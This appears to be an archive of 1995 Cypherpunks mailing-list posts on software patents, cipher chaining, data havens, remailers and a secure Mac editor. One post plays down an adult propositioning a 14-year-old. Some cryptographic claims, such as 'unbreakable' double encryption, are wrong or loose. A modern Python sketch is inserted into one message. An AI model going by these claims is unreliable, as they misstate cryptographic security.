073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig!
From mark at unicorn.com Thu Jan 12 13:12:58 1995 From: mark at unicorn.com (Mark Grant) Date: Thu, 12 Jan 95 13:12:58 PST Subject: Reefer madness In-Reply-To: <9501122019.AA14798@pilot.njin.net> Message-ID: On Thu, 12 Jan 1995, Frederic Halper wrote: > Any person no matter their age should be wary if someone solicits them > for sex. I agree, however it does seem to be a bit much for a horny geek who propositions a supposed 21-year old who turns out to be 14 to be sent to jail and forever marked as an EVIL PEDOPHILE, rather than just being told to get a life. Particularly if, say, the girl in question was posting to alt.sex.wanted or something. But the main point I was trying to make here is that with laws like this proof of age would be required in both directions. Of course, a system that stamped each users age on outgoing messages could well lead to more real-world abuse by the real crazies, not less... Mark From dean at hi.com Thu Jan 12 14:12:56 1995 From: dean at hi.com (Dean Anderson) Date: Thu, 12 Jan 95 14:12:56 PST Subject: LPF Statement on the GIF controversy Message-ID: <9501092348.AA28210@loki.hi.com> [ Please repost this wherever you think is appropriate! ] Until now, most computer professionals and companies have ignored the problem of software patents. The GIF format for graphical images was adopted widely on the net, despite the Unisys patent covering the LZW data compression algorithm. The patent dates to 1985, but its enforcement has been carried out with private threats; most victims are afraid to talk about it. Now the patent has shown its teeth. For a few days, the Internet community was shaking with anger at the surprise demand to pay license fees for the use of GIF format. It turns out that the license being offered today is only for Compuserve users. Compuserve accepted an offer from Unisys that they couldn't refuse. Compuserve users can accept this offer now, or face Unisys later on their own. 
The rest of us don't have a choice--we get to face Unisys when they decide it's our turn. So much trouble from just one software patent. There are now over ten thousand software patents in the US, and several thousand more are issued each year. Each one may be owned by, or could be bought by, a grasping company whose lawyers carefully plan to attack people at their most vulnerable moments. Of course, they couch the threat as a "reasonable offer" to save you miserable years in court. "Divide and conquer" is the watchword: pursue one group at a time, while advising the rest of us to relax because we are in no danger today. Software patents may not seem like an urgent problem until you find one aimed at you. We all have other fires to fight, and most developers have hoped that the patents would never blaze up. In an ironic way, Unisys has done us a favor--by showing that the problem is too serious to ignore. What people first feared, could just as well have happened. Each of the thousands of software patents has the potential to devastate a segment of the community, both software developers and users. There will be more nasty surprises. They are part of a system. Unisys has given us a chance to work together to change the system--rather than waiting to be sued one by one for this patent or that. We can win the fight against software patents, if we speak loud and clear against them. What can people do? * Express your disapproval to Unisys by writing a letter to its CEO. Tell him what you think of his company's actions: James Unruh CEO UNISYS Corp. PO Box 500 Blue Bell, PA 19424 fax: 215-986-6850 Please use snail mail--a physical pile of letters is more impressive, psychologically, than a big file of email. Keep it short--ten lines is enough. Don't spend hours composing your letter; there's no need. But do write it in your own words, because sending a form letter written by someone else is not impressive. 
Make it clear that the usual excuses--"We're just exercising our property rights; look how reasonable we are being (compared to what we _could_ have done)"--won't wash with you. Avoid saying anything nasty that would give Unisys a chance to paint itself as the victim. Cold condemnation is more powerful than flames. Please email a copy of your letter to the League for Programming Freedom at gif-letters at lpf.org. We might ask you for permission to publish your letter. * Don't sign a license--stop using GIF. The World Wide Web consortium at MIT will probably be coordinating the move away from GIF, and offering advice and assistance. See `http://www.w3.org/'. * Join the League for Programming Freedom. The League is a membership-based organization whose aim is to bring back the freedom to write software. The League says that no one should be able to dictate what kinds of programs you can write. You can contact the LPF by email to lpf at uunet.uu.net, or look at its Web pages at `http://www.lpf.org/'. ** Note: the recent license demand came in the name of Compuserve; but the impetus for it came from Unisys. Compuserve developed the GIF format many years ago, not knowing there was a patent on LZW. (Most programmers have no idea what patents their programs are vulnerable to--there are too many patents to keep track of.) When Unisys threatened to sue them, Compuserve had to give in to Unisys's demands. Compuserve arranged to be allowed to offer Compuserve users a sublicense, but the "offer" was formulated in a way that was tantamount to an ultimatum. Compuserve may bear responsibility for some of the details of how this was handled, but the main responsibility falls on Unisys. It is Unisys that claims the power to dictate what kinds of software you can write. Unisys decided to use the power for aggression; Unisys forced Compuserve to participate. 
=++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++= Dean Anderson Dean at hi.com President League for Programming Freedom From blancw at microsoft.com Thu Jan 12 14:28:47 1995 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 12 Jan 95 14:28:47 PST Subject: Reefer madness Message-ID: <9501122229.AA13951@netmail2.microsoft.com> From: Sandy Sandfort Ever seen a Turkish prison film, Reuben? ......................................................... I don't get it. (I haven't seen one) Blanc From pdlamb at iquest.com Thu Jan 12 14:32:59 1995 From: pdlamb at iquest.com (Patrick Lamb) Date: Thu, 12 Jan 95 14:32:59 PST Subject: Multiple symetric cyphers Message-ID: <199501122232.QAA04830@vespucci.iquest.com> >In article <199501120502.VAA29808 at largo.remailer.net>, >Eric Hughes wrote: >> From: cactus at seabsd.hks.net (L. Todd Masco) (bunch of stuff deleted) >> I guess this reduces to: do strong cyphers have "signatures" of some sort, >> by which the type of encryption can be derived? >> >>If they do, they're likely not _strong_ ciphers. > >Great... that's the answer I was looking for, and what my gut feeling >was. I'm trying to determine how much rope is too much for a first pass. > >Related: is there, in general or in any known specific cases, any loss of >security in using sym. cipher A on ciphertext B (of another sym. cipher) with >the same key? With different keys (I would think not, but I vaguely >remember mention of something here long ago)? Is this asking the question, "Does DES form a group with IDEA?" (Substitute your favorite cipher.) Since it took about 15 years to figure out DES is _not_ a group, I suspect it will take a long time to figure out the answer to that question for each pair of ciphers you're going to substitute. Seems to me it's a good basic idea. If it costs, for example, a million bucks to crack a cipher; you have three ciphers that can be used; then the best-case cost to crack a message just tripled! 
Of course, if you choose two ciphers stronger than DES, it probably went up a little more (g).

If the ciphers don't form a group, you just made your system unbreakable. Just use two ciphers. Then a brute-force attacker has to check each key for each cipher once when it is applied first, and once for each of the possible keys for the other cipher when it is applied second!

Sounds too good to be true. Am I missing something?

Pat

From daleh at ix.netcom.com Thu Jan 12 14:34:47 1995
From: daleh at ix.netcom.com (Dale Harrison AEGIS)
Date: Thu, 12 Jan 95 14:34:47 PST
Subject: How do I know if its encrypted?
Message-ID: <199501122233.OAA02325@ix3.ix.netcom.com>

You wrote:

>You don't always need the correct answer. You just need the correct
>answer most of the time. You're trying to create a presumption about
>behavior. Ensuring that you can't read almost all of the traffic is a
>pretty good way to assure people that you don't try to make sense of
>any of it.

I'm still not making my point. Encryption is not a data 'state' that can be tested for in the way that liquid/solid/vapour are states of matter. Encryption is a data 'interpretation' for which there are an arbitrarily large number of interpretations available for any given dataset. There is no algorithmic test that can be applied to a dataset that will be able to establish the existence or non-existence of a given interpretation. If you're given an unknown dataset and are asked the question, 'Is this an image file' or 'Is this an encrypted file' or 'Is this an audio clip', there is no algorithmic test that can answer any of these questions in either the affirmative or the negative. This is just an alternate phrasing of Goedel's Undecidability Theorem. This problem lies permanently outside the outer boundary of algorithmic capability.

Let me now spin a little tale as to how this affects an operator of a re-mailer or datahaven. This tale has two characters, Paco the child pornographer and Eric the honest RM/DH operator.
Paco begins by inventing the new 'Foolproof Barometric Graphic Image Format' (aka FooBar GIF) of which only Paco knows the internals. A FooBar GIF has a statistical profile that looks remarkably like a PGP file, in fact it even comes with a PGP header! Nothing illegal here. Now Paco writes a FooBar GIF Viewer which he sells to child-porn types. Again, there's nothing illegal about the sale of such a piece of software. Paco now anonymously loads Eric's DH with lots of child-porn FooBar GIFs via Eric's anon-RM. These files of course sail right through Eric's filters with nary a scratch. As far as Eric knows he's holding PGP encrypted files. Now Paco advertises the availability of lots of 'good' pictures on Eric's DH that can be used with the newly purchased FooBar GIF Viewers.

Then the cops get ahold of one of Paco's FooBar GIF Viewers and download some FooBar GIFs from Eric's DH and the last words we ever hear from Eric are "I swear I thought they were PGP files, I swear to God I thought they were....." as the authorities drag his carcass off to jail. Who's going to believe Eric's protests of innocence? "After all", says the prosecutor to the jury, "wasn't Eric explicitly filtering out what he didn't want in? In fact", says the prosecutor, "his filter seems to have been designed specifically to allow these kiddie-porn files in and to reject all others." A sad end indeed!

Dale H.

From grmorgan at freenet.vcu.edu Thu Jan 12 14:46:08 1995
From: grmorgan at freenet.vcu.edu (Greg Morgan)
Date: Thu, 12 Jan 95 14:46:08 PST
Subject: Multiple symetric cyphers
Message-ID: <9501122245.AA18097@freenet.vcu.edu>

>
>> But selecting a single cipher is just as much a fixed policy as a
>> randomly selected one is. Far better to let the user pick a policy,
>> both about sent and accepted ciphers.
>
>If you do give the user control, what is an acceptable mechanical
>implementation?
>Let's say I have a file encryptor which allows the
>user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I
>require the user to tell that program what cypher was used to encrypt
>the file she wishes to decrypt?
>
>Is storing the cypher type as part of the encrypted file a weakness?

Perhaps an MD5 of the password could be encrypted along with the plaintext using the method(s) of choice. At the decryption phase, the password would be MD5 hashed again and the block of bytes the size of an MD5 hash would be "decrypted" with each of the methods... whichever one matches the original MD5 hash would be used to decrypt the rest of the cyphertext. This method wouldn't leave a known plaintext in the file to attack.

--
-----------------------------------------------------------------------------
Greg Morgan | "I dunno Brain, me and Pipi

From pcassidy at world.std.com Thu Jan 12 14:48:31 1995
From: pcassidy at world.std.com (Peter F Cassidy)
Date: Thu, 12 Jan 95 14:48:31 PST
Subject: Reefer madness
In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com>
Message-ID:

Who are the big public key registries out there now? Just got a call that the USPS is developing its own public key registry. Is this news to you guys?

From eric at remailer.net Thu Jan 12 14:54:26 1995
From: eric at remailer.net (Eric Hughes)
Date: Thu, 12 Jan 95 14:54:26 PST
Subject: How do I know if its encrypted?
In-Reply-To: <199501121701.JAA24309@jobe.shell.portal.com>
Message-ID: <199501122252.OAA01584@largo.remailer.net>

   From: Hal

   The idea of offsite storage doesn't seem that helpful since you can just store the data on your own disk in encrypted form.

I'll tell you one really useful facility for offsite storage, and that's private key backup. Use a secret sharing arrangement, say 5 out of 7 reconstruction, and send out 7 chunks. Now, give a different pointer-to-chunk to each of 7 different people. In the case of catastrophe, you can recover your key.
Too paranoid not to let your key out of your sight? Then don't do this. Here's another use. I'd like to interlock offsite backup with my digital money withdrawals, so that my money is always backed up. Let's be clear; the code that dfloyd at io.com is working on is offsite storage in a reasonably secure form. It's not a data haven. Eric From rah at shipwright.com Thu Jan 12 15:30:08 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 12 Jan 95 15:30:08 PST Subject: Microsoft TrueName (tm) (fwd) Message-ID: At 11:23 AM 1/12/95, NetSurfer wrote: >I wondered why one of the few registered hosts for Microsoft were called >"Bob" - now it makes sense. (But they've got a good sized chunk of >netblks registered...) Funny thing happened to me last night. I was talking to a guy who had seen Fidelity's new WWW server (shhh! don't tell!) and it turns out he was the guy who actually *had* bob.com. A third party approached him and asked him if he wanted to sell the domain name. He did. He picked another domain name, and last week someone called him if he wanted to sell his *new* domain name. He said no, and they asked him if he would *rent* it to them... Go figure. Cheers, Bob Hettinga Eric, what'll you take for "remailer.net"? ;-). ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." 
-- Bertrand Russell (617) 323-7923 From rah at shipwright.com Thu Jan 12 15:30:13 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 12 Jan 95 15:30:13 PST Subject: Available: Cash paper by anonymous FTP Message-ID: >From: brands at cwi.nl >Original-From: Stefan.Brands at cwi.nl >Subject: Available: Cash paper by anonymous FTP >To: www-buyinfo at allegra.att.com >Date: Thu, 12 Jan 1995 18:57:39 +0100 (MET) >Mime-Version: 1.0 >Status: U > > > I have made available for ftp-retrieval my paper > > "Off-Line Electronic Cash Based on Secret-Key certificates." > > This paper will be presented at the Second International Symposium of > Latin American Theoretical Informatics (LATIN '95), April 3-7, 1995. > > If you are interested in downloading a copy, login by anonymous ftp at > > ftp.cwi.nl > > The paper is in the directory pub/brands, under the name > "latin95.." The extension refers to dvi and PostScript > formats. > > Greetings > > Stefan Brands, > ------------------------------------------------------ > CWI, Kruislaan 413, 1098 SJ Amsterdam, The Netherlands > Tel: +31 20 5924103, e-mail: brands at cwi.nl > > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." 
-- Bertrand Russell (617) 323-7923

From rah at shipwright.com Thu Jan 12 15:31:19 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 12 Jan 95 15:31:19 PST
Subject: Paper on NetCheque and requirements of network payment services
Message-ID:

>From: bcn at ISI.EDU
>Date: Thu, 12 Jan 1995 11:11:49 -0800
>Posted-Date: Thu, 12 Jan 1995 11:11:49 -0800
>Original-From: Clifford Neuman
>To: www-buyinfo at allegra.att.com
>Subject: Paper on NetCheque and requirements of network payment services
>Status: U
>
>There is a new paper available on NetCheque(TM) and requirement of
>network payment services. The paper will be presented at IEEE Compcon
>in March. The paper can be retrieved from prospero.isi.edu in
>
>/pub/netcheque/information/netcheque-requirements-compcon95.ps.Z.
>
>Clifford Neuman

-----------------
Robert Hettinga (rah at shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923

From claborne at microcosm.sandiegoca.ATTGIS.COM Thu Jan 12 15:45:39 1995
From: claborne at microcosm.sandiegoca.ATTGIS.COM (Claborne, Chris)
Date: Thu, 12 Jan 95 15:45:39 PST
Subject: San Diego CPunks Symposium
Message-ID: <2F158E27@microcosm.SanDiegoCA.ATTGIS.COM>

CPUNKS symposium
Thursday, Jan 26, 1995

Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop" where I hope to get an update of weasel man's new anonymous e-mail server, "mixmaster", exchange keys, and generally shoot the shit.

Don't forget to bring your public key fingerprint. If you can figure out how to get it on the back of a business card, that would be cool.

Place: The Mission Cafe & Coffee Shop 488-9060
       3795 Mission Bl in Mission Beach.
Time:1800

Their Directions:
8 west to Mission Beach Ingram Exit
Take west mission bay drive
Go right on Mission Blvd.
On the corner of San Jose and mission blvd.
It is located between roller coaster and garnett.
It's kind of 40s looking building... funky looking (their description, not mine)

I will be wearing a BRIGHT PURPLE BICYCLING JACKET. Try to be there by 18:30 since we may move the meeting.

See you there!

Weasel man, don't forget to bring the latest info on mixmaster.
Fish man, sweep the place for bugs.
Anarchist, the FBI has already set up surveillance.
Law man, bring the logo and your e-mail address of the month :)
New guy, bring your fingerprint.

NOTE: My e-mail address, "chris.claborne at sandiegoca.attgis.com" permanently replaces my .ncr.com address. Both addresses work for now but NCR address will eventually be killed.

2 -- C --

P.S. Tell your wife/husband you are going to a symposium. Unless she/he looks in the dictionary, she/he won't know that you are really going to a drinking party!

 ...  __o
 ..   -\<,       chris.claborne at sandiegoca.attgis.com
 ...(*)/(*).     CI$: 76340.2422
PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.

From tjb at acpub.duke.edu Thu Jan 12 16:11:42 1995
From: tjb at acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 16:11:42 PST
Subject: RELEASE: Secure Edit beta 0.5
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

RELEASE: secure edit beta 0.5 for Macintosh

Miyako Software has released an improved version of secure edit. It is now available for FTP from ripem.msu.edu in the directory pub/crypt/mac, and at other ITAR-compliant sites. Finger tjbryce at amherst.edu for an updated site list, as well as information on other products by miyako software. All releases are signed with the Miyako Software public PGP key.
Version b0.5 sports the following new features: FOR EASE OF USE AND UTILITY: * extensive balloon help * an undo command * print command * a find command (useful for storing sensitive information with secure edit) * windows menu with tile and stack commands * copy with line breaks inserted, for composing email or pgp messages * much better and faster compression and a smaller base file size * secure edit now uses Colin Plumb's fast 68k assembly IDEA implementation * you can turn off the annoying � marks * the menu blinking clunky has been fixed * the window update annoyance has been fixed * various interface clunkies have been fixed * new and more intuitive icons have been drawn FOR SECURITY: * much better random number management using the code written by Colin Plumb for PGP * random data is snarfed from all events the application observes (such as your keystrokes), the time these events occur, and by continuously tracking your mouse position, even when backgrounded. the pool of random data is maintained between sessions and is encrypted based on these random events before it is written to disk and before use. * so that every file is encrypted on a different IDEA key, making cryptanalysis of one useless agaist others, your key is salted with 128 bits of random data, stored in the clear for decryption, to make a 'session key'. thus, the key used to encrypt every file will be different, even if you used the same passphrase. this makes cryptanalysis of one file useless against others. * the salt is concatenated with MD5[passphrase] many times and this concatenated string hashed to generate the 'session key' for the file from your pass phrase. The number of times it is concatenated is calibrated to make it take about half a second - not a big performance loss, but it makes brute force attack of weak passphrases up to thousands of times more costly. 
* semi-splay compression is utilized, which is faster than the lame old compression (written by me :( ) and which gets >50% file reduction. It strengthens the encryption by reducing the redundancy in the plaintext. It also continually modifies the compression encoding system based on the data as it goes along, making the interpretation of compressed data dependent on the data that has come before it * you can verify keys against Curve Encrypt keyfiles * documents that are saved in plaintext format clearly distinguished by "TEXT:" in the window title * the source code has been cleaned up :-) and much improved to make it easier to verify yourself that the program is strong and secure. ------THE BASICS------ (from version a 0.3.4) SECURE EDIT is an editor designed for editing sensitive text buffers. It is designed to prevent plaintext from ever being written to disk, even if only momentarily. You might fail to overwrite or encrypt such plaintext properly, or your opponent might be able to retrieve some of the information even though you wiped it (see docs for details). Word Processors generally create temp and scratch files that leave plaintext on your drive whether you like it or not. Secure edit fixes this problem. Sometimes you need to quit in a hurry and have all your data encrypted and saved. Or you might prefer to have your files encrypted at all times so that you never forget to re-encrypt a file you worked on, and so that files are never in plaintext form while you are working with them. Secure edit sports the following features to serve these and other data security needs: * Plaintext is never written to disk - Secure Edit locks all sensitive buffers in memory so that virtual memory will never swap them to disk. This includes the text you are editing as well as any encryption keys in use. 
* Secure Edit never creates plaintext temp or scratch files * Secure Edit offers the option of saving files directly in encrypted format so you never have plaintext on the hard drive. * Your data is compressed and encrypted in RAM with the IDEA algorithm, then written to disk in encrypted format. * Secure Edit can mantain a secure, private clipboard, interconverting with the system clipboard only when you use OPTION-cut,copy, and paste. This prevents the system from getting a copy of your sensitive data and possibly writing it to disk, or leaving it around for another user to see. * Secure Edit can open foreign text files, and DOD wipe them on request when you save the file in encrypted format. * Secure Edit offers a default passphrase option so you only need to enter your passphrase once. It also offers the option of validating your phrase against secure validation information that can be used to check that you have entered your standard pass phrase, but which cannot be used to recover the passphrase. This prevents you from saving under a bad passphrase and losing data. * Secure Edit offers a time-out option, whereby it will save all files and quit after a certain idle time period * Secure Edit offers an option-quit feature, whereby it will assume it is okay to save all files, and save and quit as quickly as possible * Secure Edit is available to U.S. citizens in the U.S. at an ITAR-compliant site near you. I'm presently uploading it to ripem.msu.edu and others. * source code is, of course, available. * Questions about Secure Edit should be directed to me, at Thanks for your attention. Tom Bryce /////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *---------------------------------------------------------* Miyako Software is dedicated to creating freeware to help make computers tools of personal liberation and expression. 
for product info and PGP key, finger email: *---------------------------------------------------------* \\\\\\\\\\\\\\\\\\\\\\\\\\\\\_///////////////////////////// -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxN4F08YjrUhOUC5AQGueAQAkJNvwUO5QVZd9FQnfwm2HnKiFH/DvAUQ 2TWkrqhRJ2R06Ht98Vrw/ixacQLP9GEobKlK1WDdQE/lNZGre2IgLS0lXm39F1ll A0wSIpRrJ5wK2KlWEbq1e5cuaooA/+Y2C6U7RAQbj+/wF9/9FqKvzmLAzYgx2pqD VxDCzkn2A4s= =d0DX -----END PGP SIGNATURE----- ------------------------------------------------------------------------ /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\ | Tom Bryce |____| ___ | Duke Med | ___ {~._.~} | tjb at acpub.duke.edu | {~._.~) ( Y ) | PGP keys: finger tjbryce at amherst.edu | ( Y ) ()~*~() |personal:9B6088464ED86413 0F5E55E45CF1C961| ()~*~() (_)-(_) |miyako | (_)-(_) |software:02646F0B06DCFE03 E6DD367DB4E1010F| /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ | \_________________________________________\__/ From yusuf921 at uidaho.edu Thu Jan 12 17:11:04 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Thu, 12 Jan 95 17:11:04 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: On Wed, 11 Jan 1995, Samuel Kaplin wrote: > I hope they took you someplace nice for lunch...You might want to file a > FOI request on yourself, just to see how much they censor. ;) They might > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) > For the benifit of myself and the list, how would you go about doing that? > Sam > skaplin at skypoint.com | Finger skaplin at infinity.c2.org for > E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard > Finger skaplin at mirage.skypoint.com | outside a Roman brothel. > A man wrapped up in himself makes a very small package. --Syed From Ben.Goren at asu.edu Thu Jan 12 17:17:50 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Thu, 12 Jan 95 17:17:50 PST Subject: How do I know if its encrypted? Message-ID: Here's a solution: Alice sends a file to Dave's DataHaven. 
When Alice wants her file back, she sends to Dave a secure hash of the file, a key with which to decrypt it, and a handful of plaintext at the beginning of the file. Dave decrypts the file that matches the hash with the key Alice gave him; if the file begins as Alice says it should, Dave returns the file to Alice.

This way, only those people who have an intimate knowledge of the files can recover them. The hash isn't vital; Dave could try to decrypt each file on the server with the key Alice gives him until he matches the plaintext--but that's neither elegant nor friendly to the CPU.

People can send Dave whatever kind of file they like, but they'll only get it back if it's been encrypted properly.

If Dave charges to store a file, he'll gladly welcome as much spammage as people want to send him. If he likewise charges to return a file, he'll just as gladly send a file to whoever gives him the cash and can identify it.

Dave can have a policy whereby he deletes a file after returning it, unless Alice pays more to keep it there. Thus, Bad Bobby can send his naughty pictures to Dave, tell the 'net how to get them--but the first person who neglects to include the fee to leave the pictures there winds up blocking out everybody else. Similarly, Samaritan Sam could get into a spending war with Bobby. Each time Bobby sends Dave his smut, Sam retrieves the file without paying for its continued storage--and takes a sneak peek at the pictures before deleting them himself.

Dave has no way of knowing what people are storing on his machine until the owner asks for the file back, and so cannot be held liable for the storage of "undesirable" files. Mallet could seize the entire archive and have nothing useful. Eve could recover information leaving the haven, but presumably Alice will further encrypt her files however she chooses. Or, as a service, Dave could agree to encrypt the file with an asymmetric cipher before returning it.
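Added example, not part of the original post: a Python sketch of the retrieval check described above, including Dave's delete-after-return policy. The SHA-256 keystream cipher is a stand-in for whatever cipher Alice really uses, and the class and function names, the 16-byte minimum prefix and the choice to hash the stored (encrypted) blob are assumptions.

```python
import hashlib
import hmac

MIN_PREFIX = 16  # assumption: "a handful of plaintext" must be at least this long


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Stand-in cipher (assumption): XOR with a SHA-256 counter keystream.

    Encryption and decryption are the same operation.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


class DataHaven:
    """Dave's side: he stores opaque blobs and never sees a key until retrieval."""

    def __init__(self):
        self._files = {}  # hex SHA-256 of the stored blob -> stored blob

    def store(self, blob: bytes) -> str:
        """Accept any blob at all; return the hash that identifies it."""
        digest = hashlib.sha256(blob).hexdigest()
        self._files[digest] = blob
        return digest

    def retrieve(self, digest, key, claimed_prefix, pay_to_keep=False):
        """Return the decrypted file only if it begins as the requester claims."""
        blob = self._files.get(digest)
        if blob is None or len(claimed_prefix) < MIN_PREFIX:
            return None
        # Decrypt just the head first; a wrong key or a wrong claim stops here
        # and the stored file is left untouched.
        head = keystream_xor(key, blob[:len(claimed_prefix)])
        if not hmac.compare_digest(head, claimed_prefix):
            return None
        plaintext = keystream_xor(key, blob)
        if not pay_to_keep:
            del self._files[digest]  # policy from the post: delete after returning
        return plaintext


if __name__ == "__main__":
    # Constructed sample data.
    haven = DataHaven()
    key = b"0123456789abcdef"
    document = b"Meeting notes, 12 Jan 1995: " + b"lorem ipsum " * 8
    ticket = haven.store(keystream_xor(key, document))
    print("wrong key :", haven.retrieve(ticket, b"fedcba9876543210", document[:16]))
    print("right key :", haven.retrieve(ticket, key, document[:16])[:28])
    print("again     :", haven.retrieve(ticket, key, document[:16]))
```

The minimum prefix length matters: with a one-byte prefix, a requester who knows only the hash has a 1-in-256 chance per attempt of passing the check with an arbitrary key.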
b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From dean at hi.com Thu Jan 12 17:24:56 1995 From: dean at hi.com (Dean Anderson) Date: Thu, 12 Jan 95 17:24:56 PST Subject: /n@Nd0/ LPF Statement on the GIF controversy Message-ID: <9501092348.AA28210@loki.hi.com.nando> [ Please repost this wherever you think is appropriate! ] Until now, most computer professionals and companies have ignored the problem of software patents. The GIF format for graphical images was adopted widely on the net, despite the Unisys patent covering the LZW data compression algorithm. The patent dates to 1985, but its enforcement has been carried out with private threats; most victims are afraid to talk about it. Now the patent has shown its teeth. For a few days, the Internet community was shaking with anger at the surprise demand to pay license fees for the use of GIF format. It turns out that the license being offered today is only for Compuserve users. Compuserve accepted an offer from Unisys that they couldn't refuse. Compuserve users can accept this offer now, or face Unisys later on their own. The rest of us don't have a choice--we get to face Unisys when they decide it's our turn. So much trouble from just one software patent. There are now over ten thousand software patents in the US, and several thousand more are issued each year. Each one may be owned by, or could be bought by, a grasping company whose lawyers carefully plan to attack people at their most vulnerable moments. Of course, they couch the threat as a "reasonable offer" to save you miserable years in court. "Divide and conquer" is the watchword: pursue one group at a time, while advising the rest of us to relax because we are in no danger today. Software patents may not seem like an urgent problem until you find one aimed at you. We all have other fires to fight, and most developers have hoped that the patents would never blaze up. 
In an ironic way, Unisys has done us a favor--by showing that the problem is too serious to ignore. What people first feared, could just as well have happened. Each of the thousands of software patents has the potential to devastate a segment of the community, both software developers and users. There will be more nasty surprises. They are part of a system. Unisys has given us a chance to work together to change the system--rather than waiting to be sued one by one for this patent or that. We can win the fight against software patents, if we speak loud and clear against them. What can people do? * Express your disapproval to Unisys by writing a letter to its CEO. Tell him what you think of his company's actions: James Unruh CEO UNISYS Corp. PO Box 500 Blue Bell, PA 19424 fax: 215-986-6850 Please use snail mail--a physical pile of letters is more impressive, psychologically, than a big file of email. Keep it short--ten lines is enough. Don't spend hours composing your letter; there's no need. But do write it in your own words, because sending a form letter written by someone else is not impressive. Make it clear that the usual excuses--"We're just exercising our property rights; look how reasonable we are being (compared to what we _could_ have done)"--won't wash with you. Avoid saying anything nasty that would give Unisys a chance to paint itself as the victim. Cold condemnation is more powerful than flames. Please email a copy of your letter to the League for Programming Freedom at gif-letters at lpf.org. We might ask you for permission to publish your letter. * Don't sign a license--stop using GIF. The World Wide Web consortium at MIT will probably be coordinating the move away from GIF, and offering advice and assistance. See `http://www.w3.org/'. * Join the League for Programming Freedom. The League is a membership-based organization whose aim is to bring back the freedom to write software. 
The League says that no one should be able to dictate what kinds of programs you can write. You can contact the LPF by email to lpf at uunet.uu.net, or look at its Web pages at `http://www.lpf.org/'. ** Note: the recent license demand came in the name of Compuserve; but the impetus for it came from Unisys. Compuserve developed the GIF format many years ago, not knowing there was a patent on LZW. (Most programmers have no idea what patents their programs are vulnerable to--there are too many patents to keep track of.) When Unisys threatened to sue them, Compuserve had to give in to Unisys's demands. Compuserve arranged to be allowed to offer Compuserve users a sublicense, but the "offer" was formulated in a way that was tantamount to an ultimatum. Compuserve may bear responsibility for some of the details of how this was handled, but the main responsibility falls on Unisys. It is Unisys that claims the power to dictate what kinds of software you can write. Unisys decided to use the power for aggression; Unisys forced Compuserve to participate. =++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++= Dean Anderson Dean at hi.com President League for Programming Freedom From Ben.Goren at asu.edu Thu Jan 12 17:33:12 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Thu, 12 Jan 95 17:33:12 PST Subject: RELEASE: Secure Edit beta 0.5 Message-ID: At 5:18 PM 1/12/95, Tom Bryce wrote: >[. . .] >* the salt is concatenated with MD5[passphrase] many times and this >concatenated string hashed to generate the 'session key' for the file >from your pass phrase. The number of times it is concatenated is >calibrated to make it take about half a second - not a big performance >loss, but it makes brute force attack of weak passphrases up to >thousands of times more costly. >[. . . .] This is only going to work if MD5 is not a "group"--that is, if there is no simple algorithm which is equivialent to md5(md5(x)). I doubt that's been proven. 
Rather, you'd be better off using DES in any of the ways that Schneir describes (page 338 and following) and reiterate that many times. b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From pstemari at erinet.com Thu Jan 12 17:46:19 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Thu, 12 Jan 95 17:46:19 PST Subject: How do I know if its encrypted? Message-ID: <9501130137.AA03281@eri.erinet.com> At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: > ... Seems to me that a quite reasonable condition of use of a remailer is >that what is passed isn't human readable. Perhaps I missed this, but why? If someone is going to plant kiddie porn or whatever on you, does it really matter if they encrypt it first or not? If the purpose is simply to generate additional encrypted traffic to obscure stuff that needs encryption, that goal might be better served by simply encrypting files for their recipient as they pass through, in those cases where a public key is available and the msg isn't already encrypted. I forget the name of the cypher (Vigere, perhaps--the one that uses a series of Caesar-like cyphers keyed by a password), but you could just run it through that with a password of abcdefghijklmnopqrstuvwxyz and you'd flatten out the distribution enough to get it by casual inspection. --Paul J. Ste. Marie pstemari at well.sf.ca.us, 